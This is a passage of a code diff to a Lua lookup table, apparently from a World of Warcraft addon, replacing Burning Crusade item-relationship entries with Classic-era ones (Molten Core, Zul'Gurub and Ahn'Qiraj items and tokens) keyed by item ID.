- -- Leggings of the Forgotten Vanquisher - ["31099"] = { - 31029, -- Slayer's Legguards - 31044, -- Thunderheart Leggings - 31045, -- Thunderheart Legguards - 31046, -- Thunderheart Pants - 31058, -- Leggings of the Tempest + -- Crown of the Ogre King + ["18526"] = { + 228480, -- Crown of the Ogre King }, - -- Leggings of the Forgotten Protector - ["31100"] = { - 30977, -- Onslaught Greaves - 30978, -- Onslaught Legguards - 31005, -- Gronnstalker's Leggings - 31019, -- Skyshatter Leggings - 31020, -- Skyshatter Legguards - 31021, -- Skyshatter Pants + -- Cyclone Spaulders + ["18528"] = { + 228065, -- Cyclone Spaulders }, - -- Pauldrons of the Forgotten Conqueror - ["31101"] = { - 30996, -- Lightbringer Pauldrons - 30997, -- Lightbringer Shoulderbraces - 30998, -- Lightbringer Shoulderguards - 31054, -- Mantle of the Malefic - 31069, -- Mantle of Absolution - 31070, -- Shoulderpads of Absolution + -- Ogre Forged Hauberk + ["18530"] = { + 228070, -- Ogre Forged Hauberk }, - -- Pauldrons of the Forgotten Vanquisher - ["31102"] = { - 31030, -- Slayer's Shoulderpads - 31047, -- Thunderheart Spaulders - 31048, -- Thunderheart Pauldrons - 31049, -- Thunderheart Shoulderpads - 31059, -- Mantle of the Tempest + -- Unyielding Maul + ["18531"] = { + 228473, -- Unyielding Maul }, - -- Pauldrons of the Forgotten Protector - ["31103"] = { - 30979, -- Onslaught Shoulderblades - 30980, -- Onslaught Shoulderguards - 31006, -- Gronnstalker's Spaulders - 31022, -- Skyshatter Shoulderpads - 31023, -- Skyshatter Mantle - 31024, -- Skyshatter Pauldrons + -- Mindsurge Robe + ["18532"] = { + 228474, -- Mindsurge Robe + }, + -- Rod of the Ogre Magi + ["18534"] = { + 228484, -- Rod of the Ogre Magi + }, + -- Treant's Bane + ["18538"] = { + 228486, -- Treant's Bane + }, + -- Puissant Cape + ["18541"] = { + 228383, -- Puissant Cape + }, + -- Typhoon + ["18542"] = { + 228347, -- Typhoon + }, + -- Ring of Entropy + ["18543"] = { + 228359, -- Ring of Entropy + }, + -- Doomhide Gauntlets + ["18544"] = { + 228351, -- Doomhide Gauntlets + }, + -- Leggings of Arcane Supremacy + ["18545"] = { + 228345, -- Leggings of Arcane Supremacy + }, + -- Infernal Headcage + ["18546"] = { + 228353, -- Infernal Headcage + }, + -- Unmelting Ice Girdle + ["18547"] = { + 228340, -- Unmelting Ice Girdle + }, + -- Bindings of the Windseeker + ["18564"] = { + 19019, -- Thunderfury, Blessed Blade of the Windseeker + }, + -- Plans: Sulfuron Hammer + ["18592"] = { + 227727, -- Plans: Sulfuron Hammer + }, + -- Benediction + ["18608"] = { + 18646, -- The Eye of Divinity + }, + -- Anathema + ["18609"] = { + 18646, -- The Eye of Divinity + }, + -- Thorium Brotherhood Contract + ["18628"] = { + 227730, -- Thorium Brotherhood Contract + }, + -- The Eye of Divinity + ["18646"] = { + 18608, -- Benediction + 18609, -- Anathema + 228335, -- Benediction + 228336, -- Anathema + }, + -- Ancient Bone Bow + ["18680"] = { + 227996, -- Ancient Bone Bow + }, + -- Dimly Opalescent Ring + ["18684"] = { + 228016, -- Dimly Opalescent Ring + }, + -- Wraithplate Leggings + ["18690"] = { + 228041, -- Wraithplate Leggings + }, + -- Death Knight Sabatons + ["18692"] = { + 227992, -- Death Knight Sabatons + }, + -- Shivery Handwraps + ["18693"] = { + 228034, -- Shivery Handwraps + }, + -- Spellbound Tome + ["18695"] = { + 228039, -- Spellbound Tome + }, + -- Coldstone Slippers + ["18697"] = { + 228703, -- Coldstone Slippers + }, + -- Tattered Leather Hood + ["18698"] = { + 228704, -- Tattered Leather Hood + }, + -- Ancient Petrified Leaf + ["18703"] = { + 18713, -- Rhok'delar, Longbow of the Ancient Keepers + 18714, -- Ancient Sinew Wrapped Lamina + 18715, -- Lok'delar, Stave of the Ancient Keepers + 228332, -- Lok'delar, Stave of the Ancient Keepers + 228334, -- Rhok'delar, Longbow of the Ancient Keepers + }, + -- Ancient Rune Etched Stave + ["18707"] = { + 228659, -- Ancient Rune Etched Stave + }, + -- Rhok'delar, Longbow of the Ancient Keepers + ["18713"] = { + 18703, -- Ancient Petrified Leaf + }, + -- Ancient Sinew Wrapped Lamina + ["18714"] = { + 18703, -- Ancient Petrified Leaf + }, + -- Lok'delar, Stave of the Ancient Keepers + ["18715"] = { + 18703, -- Ancient Petrified Leaf + }, + -- Hammer of the Grand Crusader + ["18717"] = { + 228544, -- Hammer of the Grand Crusader + }, + -- Grand Crusader's Helm + ["18718"] = { + 228545, -- Grand Crusader's Helm + }, + -- Shroud of the Nathrezim + ["18720"] = { + 228546, -- Shroud of the Nathrezim + }, + -- Peacemaker + ["18725"] = { + 228516, -- Peacemaker + }, + -- Magistrate's Cuffs + ["18726"] = { + 228518, -- Magistrate's Cuffs + }, + -- Shadowy Laced Handwraps + ["18730"] = { + 228521, -- Shadowy Laced Handwraps + }, + -- Plaguehound Leggings + ["18736"] = { + 228534, -- Plaguehound Leggings + }, + -- Bone Slicing Hatchet + ["18737"] = { + 228535, -- Bone Slicing Hatchet + }, + -- Chitinous Plate Legguards + ["18739"] = { + 228530, -- Chitinous Plate Legguards + }, + -- Thuzadin Sash + ["18740"] = { + 228531, -- Thuzadin Sash + }, + -- Morlune's Bracer + ["18741"] = { + 228532, -- Morlune's Bracer }, - -- Magtheridon's Head (Alliance) - ["32385"] = { - 28790, -- Naaru Lightwarden's Band - 28791, -- Ring of the Recalcitrant - 28792, -- A'dal's Signet of Defense - 28793, -- Band of Crimson Fury - 32386, -- Magtheridon's Head (Horde) + -- Diabolic Mantle + ["18757"] = { + 228475, -- Diabolic Mantle }, - -- Magtheridon's Head (Horde) - ["32386"] = { - 28790, -- Naaru Lightwarden's Band - 28791, -- Ring of the Recalcitrant - 28792, -- A'dal's Signet of Defense - 28793, -- Band of Crimson Fury - 32385, -- Magtheridon's Head (Alliance) + -- Malicious Axe + ["18759"] = { + 228030, -- Malicious Axe }, - -- Verdant Sphere - ["32405"] = { - 30007, -- The Darkener's Grasp - 30015, -- The Sun King's Talisman - 30017, -- Telonicus's Pendant of Mayhem - 30018, -- Lord Sanguinar's Claim + -- Necromantic Band + ["18760"] = { + 228045, -- Necromantic Band }, - -- Swiftsteel Bracers - ["32568"] = { - 32736, -- Plans: Swiftsteel Bracers + -- Core Hound Tooth + ["18805"] = { + 228277, -- Core Hound Tooth }, - -- Swiftsteel Shoulders - ["32570"] = { - 32737, -- Plans: Swiftsteel Shoulders + -- Core Forged Greaves + ["18806"] = { + 228275, -- Core Forged Greaves }, - -- Dawnsteel Bracers - ["32571"] = { - 32738, -- Plans: Dawnsteel Bracers + -- Gloves of the Hypnotic Flame + ["18808"] = { + 228281, -- Gloves of the Hypnotic Flame }, - -- Dawnsteel Shoulders - ["32573"] = { - 32739, -- Plans: Dawnsteel Shoulders + -- Sash of Whispered Secrets + ["18809"] = { + 228282, -- Sash of Whispered Secrets }, - -- Bindings of Lightning Reflexes - ["32574"] = { - 32748, -- Pattern: Bindings of Lightning Reflexes + -- Wild Growth Spaulders + ["18810"] = { + 228283, -- Wild Growth Spaulders }, - -- Shoulders of Lightning Reflexes - ["32575"] = { - 32749, -- Pattern: Shoulders of Lightning Reflexes + -- Fireproof Cloak + ["18811"] = { + 228280, -- Fireproof Cloak }, - -- Living Earth Bindings - ["32577"] = { - 32750, -- Pattern: Living Earth Bindings + -- Wristguards of True Flight + ["18812"] = { + 228284, -- Wristguards of True Flight }, - -- Living Earth Shoulders - ["32579"] = { - 32751, -- Pattern: Living Earth Shoulders + -- Choker of the Fire Lord + ["18814"] = { + 228289, -- Choker of the Fire Lord }, - -- Swiftstrike Bracers - ["32580"] = { - 32746, -- Pattern: Swiftstrike Bracers + -- Essence of the Pure Flame + ["18815"] = { + 228293, -- Essence of the Pure Flame }, - -- Swiftstrike Shoulders - ["32581"] = { - 32747, -- Pattern: Swiftstrike Shoulders + -- Perdition's Blade + ["18816"] = { + 228296, -- Perdition's Blade }, - -- Bracers of Renewed Life - ["32582"] = { - 32744, -- Pattern: Bracers of Renewed Life + -- Crown of Destruction + ["18817"] = { + 228291, -- Crown of Destruction }, - -- Shoulderpads of Renewed Life - ["32583"] = { - 32745, -- Pattern: Shoulderpads of Renewed Life + -- Talisman of Ephemeral Power + ["18820"] = { + 228255, -- Talisman of Ephemeral Power }, - -- Swiftheal Wraps - ["32584"] = { - 32752, -- Pattern: Swiftheal Wraps + -- Quick Strike Ring + ["18821"] = { + 228261, -- Quick Strike Ring }, - -- Swiftheal Mantle - ["32585"] = { - 32753, -- Pattern: Swiftheal Mantle + -- Obsidian Edged Blade + ["18822"] = { + 228459, -- Obsidian Edged Blade }, - -- Bracers of Nimble Thought - ["32586"] = { - 32754, -- Pattern: Bracers of Nimble Thought + -- Aged Core Leather Gloves + ["18823"] = { + 228257, -- Aged Core Leather Gloves }, - -- Mantle of Nimble Thought - ["32587"] = { - 32755, -- Pattern: Mantle of Nimble Thought + -- Magma Tempered Boots + ["18824"] = { + 228254, -- Magma Tempered Boots }, - -- Plans: Swiftsteel Bracers - ["32736"] = { - 32568, -- Swiftsteel Bracers + -- Deep Earth Spaulders + ["18829"] = { + 228258, -- Deep Earth Spaulders }, - -- Plans: Swiftsteel Shoulders - ["32737"] = { - 32570, -- Swiftsteel Shoulders + -- Brutality Blade + ["18832"] = { + 228265, -- Brutality Blade }, - -- Plans: Dawnsteel Bracers - ["32738"] = { - 32571, -- Dawnsteel Bracers + -- Staff of Dominance + ["18842"] = { + 228271, -- Staff of Dominance }, - -- Plans: Dawnsteel Shoulders - ["32739"] = { - 32573, -- Dawnsteel Shoulders + -- Flamewaker Legplates + ["18861"] = { + 228240, -- Flamewaker Legplates }, - -- Pattern: Bracers of Renewed Life - ["32744"] = { - 32582, -- Bracers of Renewed Life + -- Helm of the Lifegiver + ["18870"] = { + 228285, -- Helm of the Lifegiver }, - -- Pattern: Shoulderpads of Renewed Life - ["32745"] = { - 32583, -- Shoulderpads of Renewed Life + -- Manastorm Leggings + ["18872"] = { + 228244, -- Manastorm Leggings }, - -- Pattern: Swiftstrike Bracers - ["32746"] = { - 32580, -- Swiftstrike Bracers + -- Salamander Scale Pants + ["18875"] = { + 228245, -- Salamander Scale Pants }, - -- Pattern: Swiftstrike Shoulders - ["32747"] = { - 32581, -- Swiftstrike Shoulders + -- Sorcerous Dagger + ["18878"] = { + 228263, -- Sorcerous Dagger }, - -- Pattern: Bindings of Lightning Reflexes - ["32748"] = { - 32574, -- Bindings of Lightning Reflexes + -- Heavy Dark Iron Ring + ["18879"] = { + 228242, -- Heavy Dark Iron Ring }, - -- Pattern: Shoulders of Lightning Reflexes - ["32749"] = { - 32575, -- Shoulders of Lightning Reflexes + -- Head of Nefarian (Horde) + ["19002"] = { + 19003, -- Head of Nefarian (Alliance) + 19366, -- Master Dragonslayer's Orb + 19383, -- Master Dragonslayer's Medallion + 19384, -- Master Dragonslayer's Ring }, - -- Pattern: Living Earth Bindings - ["32750"] = { - 32577, -- Living Earth Bindings + -- Head of Nefarian (Alliance) + ["19003"] = { + 19002, -- Head of Nefarian (Horde) + 19366, -- Master Dragonslayer's Orb + 19383, -- Master Dragonslayer's Medallion + 19384, -- Master Dragonslayer's Ring }, - -- Pattern: Living Earth Shoulders - ["32751"] = { - 32579, -- Living Earth Shoulders + -- Thunderfury, Blessed Blade of the Windseeker + ["19019"] = { + 18564, -- Bindings of the Windseeker }, - -- Pattern: Swiftheal Wraps - ["32752"] = { - 32584, -- Swiftheal Wraps + -- Wisdom of the Timbermaw + ["19047"] = { + 227806, -- Wisdom of the Timbermaw }, - -- Pattern: Swiftheal Mantle - ["32753"] = { - 32585, -- Swiftheal Mantle + -- Cold Snap + ["19130"] = { + 228381, -- Cold Snap }, - -- Pattern: Bracers of Nimble Thought - ["32754"] = { - 32586, -- Bracers of Nimble Thought + -- Snowblind Shoes + ["19131"] = { + 228384, -- Snowblind Shoes }, - -- Pattern: Mantle of Nimble Thought - ["32755"] = { - 32587, -- Mantle of Nimble Thought + -- Crystal Adorned Crown + ["19132"] = { + 228385, -- Crystal Adorned Crown }, - -- Legplates of the Holy Juggernaut - ["34167"] = { - 34382, -- Judicator's Legguards + -- Fel Infused Leggings + ["19133"] = { + 228352, -- Fel Infused Leggings }, - -- Breeches of Natural Aggression - ["34169"] = { - 34384, -- Breeches of Natural Splendor + -- Flayed Doomguard Belt + ["19134"] = { + 228355, -- Flayed Doomguard Belt }, - -- Pantaloons of Calming Strife - ["34170"] = { - 34386, -- Pantaloons of Growing Strife + -- Blacklight Bracer + ["19135"] = { + 228357, -- Blacklight Bracer }, - -- Felfury Legplates - ["34180"] = { - 34381, -- Felstrength Legplates + -- Mana Igniting Cord + ["19136"] = { + 228256, -- Mana Igniting Cord }, - -- Chain Links of the Tumultuous Storm - ["34186"] = { - 34383, -- Kilt of Spiritual Reconstruction + -- Onslaught Girdle + ["19137"] = { + 228295, -- Onslaught Girdle }, - -- Leggings of the Immortal Night - ["34188"] = { - 34385, -- Leggings of the Immortal Beast + -- Band of Sulfuras + ["19138"] = { + 228287, -- Band of Sulfuras }, - -- Pauldrons of Perseverance - ["34192"] = { - 34388, -- Pauldrons of Berserking + -- Fireguard Shoulders + ["19139"] = { + 228279, -- Fireguard Shoulders }, - -- Spaulders of the Thalassian Savior - ["34193"] = { - 34389, -- Spaulders of the Thalassian Defender - }, - -- Shoulderpads of Vehemence - ["34195"] = { - 34392, -- Demontooth Shoulderpads + -- Cauterizing Band + ["19140"] = { + 228274, -- Cauterizing Band }, - -- Shawl of Wonderment - ["34202"] = { - 34393, -- Shoulderpads of Knowledge's Pursuit + -- Fire Runed Grimoire + ["19142"] = { + 228259, -- Fire Runed Grimoire }, - -- Equilibrium Epaulets - ["34208"] = { - 34390, -- Erupting Epaulets + -- Flameguard Gauntlets + ["19143"] = { + 228260, -- Flameguard Gauntlets }, - -- Spaulders of Reclamation - ["34209"] = { - 34391, -- Spaulders of Devastation + -- Sabatons of the Flamewalker + ["19144"] = { + 228253, -- Sabatons of the Flamewalker }, - -- Harness of Carnal Instinct - ["34211"] = { - 34397, -- Bladed Chaos Tunic + -- Robe of Volatile Power + ["19145"] = { + 228239, -- Robe of Volatile Power }, - -- Sunglow Vest - ["34212"] = { - 34398, -- Utopian Tunic of Elune + -- Wristguards of Stability + ["19146"] = { + 228246, -- Wristguards of Stability }, - -- Warharness of Reckless Fury - ["34215"] = { - 34394, -- Breastplate of Agony's Aversion + -- Ring of Spell Power + ["19147"] = { + 228243, -- Ring of Spell Power }, - -- Heroic Judicator's Chestguard - ["34216"] = { - 34395, -- Noble Judicator's Chestguard + -- Pattern: Argent Boots + ["19216"] = { + 227896, -- Pattern: Argent Boots }, - -- Garments of Serene Shores - ["34229"] = { - 34396, -- Garments of Crashing Shores + -- Pattern: Argent Shoulders + ["19217"] = { + 227897, -- Pattern: Argent Shoulders }, - -- Robes of Faltered Light - ["34233"] = { - 34399, -- Robes of Ghostly Hatred + -- Pattern: Golden Mantle of the Dawn + ["19329"] = { + 227895, -- Pattern: Golden Mantle of the Dawn }, - -- Shadowed Gauntlets of Paroxysm - ["34234"] = { - 34408, -- Gloves of the Forest Drifter + -- Rune of Metamorphosis + ["19340"] = { + 210980, -- Rune of Metamorphosis }, - -- Helm of Burning Righteousness - ["34243"] = { - 34401, -- Helm of Uther's Resolve + -- Master Dragonslayer's Orb + ["19366"] = { + 19002, -- Head of Nefarian (Horde) }, - -- Duplicitous Guise - ["34244"] = { - 34404, -- Mask of the Fury Hunter + -- Master Dragonslayer's Medallion + ["19383"] = { + 19002, -- Head of Nefarian (Horde) }, - -- Cover of Ursol the Wise - ["34245"] = { - 34403, -- Cover of Ursoc the Mighty + -- Master Dragonslayer's Ring + ["19384"] = { + 19002, -- Head of Nefarian (Horde) }, - -- Cowl of Gul'dan - ["34332"] = { - 34402, -- Shroud of Chieftain Ner'zhul + -- Primal Hakkari Bindings + ["19716"] = { + 19827, -- Zandalar Freethinker's Armguards + 19833, -- Zandalar Predator's Bracers + 19846, -- Zandalar Illusionist's Wraps }, - -- Cowl of Light's Purity - ["34339"] = { - 34405, -- Helm of Arcane Purity + -- Primal Hakkari Armsplint + ["19717"] = { + 19824, -- Zandalar Vindicator's Armguards + 19830, -- Zandalar Augur's Bracers + 19836, -- Zandalar Madcap's Bracers }, - -- Handguards of the Dawn - ["34342"] = { - 34406, -- Gloves of Tyri's Power + -- Primal Hakkari Stanchion + ["19718"] = { + 19840, -- Zandalar Haruspex's Bracers + 19843, -- Zandalar Confessor's Wraps + 19848, -- Zandalar Demoniac's Wraps }, - -- Crown of Anasterian - ["34345"] = { - 34400, -- Crown of Dath'Remar + -- Primal Hakkari Girdle + ["19719"] = { + 19823, -- Zandalar Vindicator's Belt + 19829, -- Zandalar Augur's Belt + 19835, -- Zandalar Madcap's Mantle }, - -- Gauntlets of the Ancient Shadowmoon - ["34350"] = { - 34409, -- Gauntlets of the Ancient Frostwolf + -- Primal Hakkari Sash + ["19720"] = { + 19839, -- Zandalar Haruspex's Belt + 19842, -- Zandalar Confessor's Bindings + 19849, -- Zandalar Demoniac's Mantle }, - -- Tranquil Majesty Wraps - ["34351"] = { - 34407, -- Tranquil Moonlight Wraps + -- Primal Hakkari Shawl + ["19721"] = { + 19826, -- Zandalar Freethinker's Belt + 19832, -- Zandalar Predator's Belt + 19845, -- Zandalar Illusionist's Mantle }, - -- Mayhem Projection Goggles - ["34354"] = { - 35195, -- Schematic: Mayhem Projection Goggles + -- Primal Hakkari Tabard + ["19722"] = { + 19825, -- Zandalar Freethinker's Breastplate + 19828, -- Zandalar Augur's Hauberk + 19838, -- Zandalar Haruspex's Tunic }, - -- Lightning Etched Specs - ["34355"] = { - 35193, -- Schematic: Lightning Etched Specs + -- Primal Hakkari Kossack + ["19723"] = { + 19822, -- Zandalar Vindicator's Breastplate + 20033, -- Zandalar Demoniac's Robe + 20034, -- Zandalar Illusionist's Robe }, - -- Surestrike Goggles v3.0 - ["34356"] = { - 35194, -- Schematic: Surestrike Goggles v3.0 + -- Primal Hakkari Aegis + ["19724"] = { + 19831, -- Zandalar Predator's Mantle + 19834, -- Zandalar Madcap's Tunic + 19841, -- Zandalar Confessor's Mantle }, - -- Hard Khorium Goggles - ["34357"] = { - 35196, -- Schematic: Hard Khorium Goggles + -- Heart of Hakkar + ["19802"] = { + 19948, -- Zandalarian Hero Badge + 19949, -- Zandalarian Hero Medallion + 19950, -- Zandalarian Hero Charm }, - -- Sunfire Robe - ["34364"] = { - 35206, -- Pattern: Sunfire Robe + -- Zandalar Vindicator's Breastplate + ["19822"] = { + 19723, -- Primal Hakkari Kossack }, - -- Robe of Eternal Light - ["34365"] = { - 35207, -- Pattern: Robe of Eternal Light + -- Zandalar Vindicator's Belt + ["19823"] = { + 19719, -- Primal Hakkari Girdle }, - -- Sunfire Handwraps - ["34366"] = { - 35204, -- Pattern: Sunfire Handwraps + -- Zandalar Vindicator's Armguards + ["19824"] = { + 19717, -- Primal Hakkari Armsplint }, - -- Hands of Eternal Light - ["34367"] = { - 35205, -- Pattern: Hands of Eternal Light + -- Zandalar Freethinker's Breastplate + ["19825"] = { + 19722, -- Primal Hakkari Tabard }, - -- Carapace of Sun and Shadow - ["34369"] = { - 35218, -- Pattern: Carapace of Sun and Shadow + -- Zandalar Freethinker's Belt + ["19826"] = { + 19721, -- Primal Hakkari Shawl }, - -- Gloves of Immortal Dusk - ["34370"] = { - 35214, -- Pattern: Gloves of Immortal Dusk + -- Zandalar Freethinker's Armguards + ["19827"] = { + 19716, -- Primal Hakkari Bindings }, - -- Leather Chestguard of the Sun - ["34371"] = { - 35216, -- Pattern: Leather Chestguard of the Sun + -- Zandalar Augur's Hauberk + ["19828"] = { + 19722, -- Primal Hakkari Tabard }, - -- Leather Gauntlets of the Sun - ["34372"] = { - 35212, -- Pattern: Leather Gauntlets of the Sun + -- Zandalar Augur's Belt + ["19829"] = { + 19719, -- Primal Hakkari Girdle }, - -- Embrace of the Phoenix - ["34373"] = { - 35217, -- Pattern: Embrace of the Phoenix + -- Zandalar Augur's Bracers + ["19830"] = { + 19717, -- Primal Hakkari Armsplint }, - -- Fletcher's Gloves of the Phoenix - ["34374"] = { - 35213, -- Pattern: Fletcher's Gloves of the Phoenix + -- Zandalar Predator's Mantle + ["19831"] = { + 19724, -- Primal Hakkari Aegis }, - -- Sun-Drenched Scale Chestguard - ["34375"] = { - 35219, -- Pattern: Sun-Drenched Scale Chestguard + -- Zandalar Predator's Belt + ["19832"] = { + 19721, -- Primal Hakkari Shawl }, - -- Sun-Drenched Scale Gloves - ["34376"] = { - 35215, -- Pattern: Sun-Drenched Scale Gloves + -- Zandalar Predator's Bracers + ["19833"] = { + 19716, -- Primal Hakkari Bindings }, - -- Hard Khorium Battleplate - ["34377"] = { - 35211, -- Plans: Hard Khorium Battleplate + -- Zandalar Madcap's Tunic + ["19834"] = { + 19724, -- Primal Hakkari Aegis }, - -- Hard Khorium Battlefists - ["34378"] = { - 35209, -- Plans: Hard Khorium Battlefists + -- Zandalar Madcap's Mantle + ["19835"] = { + 19719, -- Primal Hakkari Girdle }, - -- Sunblessed Breastplate - ["34379"] = { - 35210, -- Plans: Sunblessed Breastplate + -- Zandalar Madcap's Bracers + ["19836"] = { + 19717, -- Primal Hakkari Armsplint }, - -- Sunblessed Gauntlets - ["34380"] = { - 35208, -- Plans: Sunblessed Gauntlets + -- Zandalar Haruspex's Tunic + ["19838"] = { + 19722, -- Primal Hakkari Tabard }, - -- Felstrength Legplates - ["34381"] = { - 34180, -- Felfury Legplates + -- Zandalar Haruspex's Belt + ["19839"] = { + 19720, -- Primal Hakkari Sash }, - -- Judicator's Legguards - ["34382"] = { - 34167, -- Legplates of the Holy Juggernaut + -- Zandalar Haruspex's Bracers + ["19840"] = { + 19718, -- Primal Hakkari Stanchion }, - -- Kilt of Spiritual Reconstruction - ["34383"] = { - 34186, -- Chain Links of the Tumultuous Storm + -- Zandalar Confessor's Mantle + ["19841"] = { + 19724, -- Primal Hakkari Aegis }, - -- Breeches of Natural Splendor - ["34384"] = { - 34169, -- Breeches of Natural Aggression + -- Zandalar Confessor's Bindings + ["19842"] = { + 19720, -- Primal Hakkari Sash }, - -- Leggings of the Immortal Beast - ["34385"] = { - 34188, -- Leggings of the Immortal Night + -- Zandalar Confessor's Wraps + ["19843"] = { + 19718, -- Primal Hakkari Stanchion }, - -- Pantaloons of Growing Strife - ["34386"] = { - 34170, -- Pantaloons of Calming Strife + -- Zandalar Illusionist's Mantle + ["19845"] = { + 19721, -- Primal Hakkari Shawl }, - -- Pauldrons of Berserking - ["34388"] = { - 34192, -- Pauldrons of Perseverance + -- Zandalar Illusionist's Wraps + ["19846"] = { + 19716, -- Primal Hakkari Bindings }, - -- Spaulders of the Thalassian Defender - ["34389"] = { - 34193, -- Spaulders of the Thalassian Savior + -- Zandalar Demoniac's Wraps + ["19848"] = { + 19718, -- Primal Hakkari Stanchion }, - -- Erupting Epaulets - ["34390"] = { - 34208, -- Equilibrium Epaulets + -- Zandalar Demoniac's Mantle + ["19849"] = { + 19720, -- Primal Hakkari Sash }, - -- Spaulders of Devastation - ["34391"] = { - 34209, -- Spaulders of Reclamation + -- Zandalarian Hero Badge + ["19948"] = { + 19802, -- Heart of Hakkar }, - -- Demontooth Shoulderpads - ["34392"] = { - 34195, -- Shoulderpads of Vehemence + -- Zandalarian Hero Medallion + ["19949"] = { + 19802, -- Heart of Hakkar }, - -- Shoulderpads of Knowledge's Pursuit - ["34393"] = { - 34202, -- Shawl of Wonderment + -- Zandalarian Hero Charm + ["19950"] = { + 19802, -- Heart of Hakkar }, - -- Breastplate of Agony's Aversion - ["34394"] = { - 34215, -- Warharness of Reckless Fury + -- Fishing Tournament! + ["19978"] = { + 217017, -- Fishing Tournament! }, - -- Noble Judicator's Chestguard - ["34395"] = { - 34216, -- Heroic Judicator's Chestguard + -- Zandalar Demoniac's Robe + ["20033"] = { + 19723, -- Primal Hakkari Kossack }, - -- Garments of Crashing Shores - ["34396"] = { - 34229, -- Garments of Serene Shores + -- Zandalar Illusionist's Robe + ["20034"] = { + 19723, -- Primal Hakkari Kossack }, - -- Bladed Chaos Tunic - ["34397"] = { - 34211, -- Harness of Carnal Instinct + -- Qiraji Magisterial Ring + ["20884"] = { + 21393, -- Signet of Unyielding Strength + 21396, -- Ring of Eternal Justice + 21399, -- Ring of the Gathering Storm + 21408, -- Band of Unending Life + 21414, -- Band of Vaulted Secrets }, - -- Utopian Tunic of Elune - ["34398"] = { - 34212, -- Sunglow Vest + -- Qiraji Martial Drape + ["20885"] = { + 21394, -- Drape of Unyielding Strength + 21406, -- Cloak of Veiled Shadows + 21412, -- Shroud of Infinite Wisdom + 21415, -- Drape of Vaulted Secrets }, - -- Robes of Ghostly Hatred - ["34399"] = { - 34233, -- Robes of Faltered Light + -- Qiraji Spiked Hilt + ["20886"] = { + 21392, -- Sickle of Unyielding Strength + 21395, -- Blade of Eternal Justice + 21398, -- Hammer of the Gathering Storm + 21401, -- Scythe of the Unseen Path + 21404, -- Dagger of Veiled Shadows }, - -- Crown of Dath'Remar - ["34400"] = { - 34345, -- Crown of Anasterian + -- Qiraji Ceremonial Ring + ["20888"] = { + 21402, -- Signet of the Unseen Path + 21405, -- Band of Veiled Shadows + 21411, -- Ring of Infinite Wisdom + 21417, -- Ring of Unspoken Names }, - -- Helm of Uther's Resolve - ["34401"] = { - 34243, -- Helm of Burning Righteousness + -- Qiraji Regal Drape + ["20889"] = { + 21397, -- Cape of Eternal Justice + 21400, -- Cloak of the Gathering Storm + 21403, -- Cloak of the Unseen Path + 21409, -- Cloak of Unending Life + 21418, -- Shroud of Unspoken Names }, - -- Shroud of Chieftain Ner'zhul - ["34402"] = { - 34332, -- Cowl of Gul'dan + -- Qiraji Ornate Hilt + ["20890"] = { + 21407, -- Mace of Unending Life + 21410, -- Gavel of Infinite Wisdom + 21413, -- Blade of Vaulted Secrets + 21416, -- Kris of Unspoken Names }, - -- Cover of Ursoc the Mighty - ["34403"] = { - 34245, -- Cover of Ursol the Wise + -- Vek'nilash's Circlet + ["20926"] = { + 21329, -- Conqueror's Crown + 21337, -- Doomcaller's Circlet + 21347, -- Enigma Circlet + 21348, -- Tiara of the Oracle }, - -- Mask of the Fury Hunter - ["34404"] = { - 34244, -- Duplicitous Guise + -- Ouro's Intact Hide + ["20927"] = { + 21332, -- Conqueror's Legguards + 21346, -- Enigma Leggings + 21352, -- Trousers of the Oracle + 21362, -- Deathdealer's Leggings }, - -- Helm of Arcane Purity - ["34405"] = { - 34339, -- Cowl of Light's Purity + -- Qiraji Bindings of Command + ["20928"] = { + 21330, -- Conqueror's Spaulders + 21333, -- Conqueror's Greaves + 21349, -- Footwraps of the Oracle + 21350, -- Mantle of the Oracle + 21359, -- Deathdealer's Boots + 21361, -- Deathdealer's Spaulders + 21365, -- Striker's Footguards + 21367, -- Striker's Pauldrons }, - -- Gloves of Tyri's Power - ["34406"] = { - 34342, -- Handguards of the Dawn + -- Carapace of the Old God + ["20929"] = { + 21331, -- Conqueror's Breastplate + 21364, -- Deathdealer's Vest + 21370, -- Striker's Hauberk + 21374, -- Stormcaller's Hauberk + 21389, -- Avenger's Breastplate }, - -- Tranquil Moonlight Wraps - ["34407"] = { - 34351, -- Tranquil Majesty Wraps + -- Vek'lor's Diadem + ["20930"] = { + 21353, -- Genesis Helm + 21360, -- Deathdealer's Helm + 21366, -- Striker's Diadem + 21372, -- Stormcaller's Diadem + 21387, -- Avenger's Crown }, - -- Gloves of the Forest Drifter - ["34408"] = { - 34234, -- Shadowed Gauntlets of Paroxysm + -- Skin of the Great Sandworm + ["20931"] = { + 21336, -- Doomcaller's Trousers + 21356, -- Genesis Trousers + 21368, -- Striker's Leggings + 21375, -- Stormcaller's Leggings + 21390, -- Avenger's Legguards }, - -- Gauntlets of the Ancient Frostwolf - ["34409"] = { - 34350, -- Gauntlets of the Ancient Shadowmoon + -- Qiraji Bindings of Dominance + ["20932"] = { + 21335, -- Doomcaller's Mantle + 21338, -- Doomcaller's Footwraps + 21344, -- Enigma Boots + 21345, -- Enigma Shoulderpads + 21354, -- Genesis Shoulderpads + 21355, -- Genesis Boots + 21373, -- Stormcaller's Footguards + 21376, -- Stormcaller's Pauldrons + 21388, -- Avenger's Greaves + 21391, -- Avenger's Pauldrons }, - -- Lightbringer Bands - ["34431"] = { - 34848, -- Bracers of the Forgotten Conqueror + -- Husk of the Old God + ["20933"] = { + 21334, -- Doomcaller's Robes + 21343, -- Enigma Robes + 21351, -- Vestments of the Oracle + 21357, -- Genesis Vest }, - -- Lightbringer Bracers - ["34432"] = { - 34848, -- Bracers of the Forgotten Conqueror + -- Head of Ossirian the Unscarred + ["21220"] = { + 21504, -- Charm of the Shifting Sands + 21505, -- Choker of the Shifting Sands + 21506, -- Pendant of the Shifting Sands + 21507, -- Amulet of the Shifting Sands }, - -- Lightbringer Wristguards - ["34433"] = { - 34848, -- Bracers of the Forgotten Conqueror + -- Eye of C'Thun + ["21221"] = { + 21709, -- Ring of the Fallen God + 21710, -- Cloak of the Fallen God + 21712, -- Amulet of the Fallen God }, - -- Bracers of Absolution - ["34434"] = { - 34848, -- Bracers of the Forgotten Conqueror + -- Defender of the Timbermaw + ["21326"] = { + 227811, -- Defender of the Timbermaw }, - -- Cuffs of Absolution - ["34435"] = { - 34848, -- Bracers of the Forgotten Conqueror + -- Conqueror's Crown + ["21329"] = { + 20926, -- Vek'nilash's Circlet }, - -- Bracers of the Malefic - ["34436"] = { - 34848, -- Bracers of the Forgotten Conqueror + -- Conqueror's Spaulders + ["21330"] = { + 20928, -- Qiraji Bindings of Command }, - -- Skyshatter Bands - ["34437"] = { - 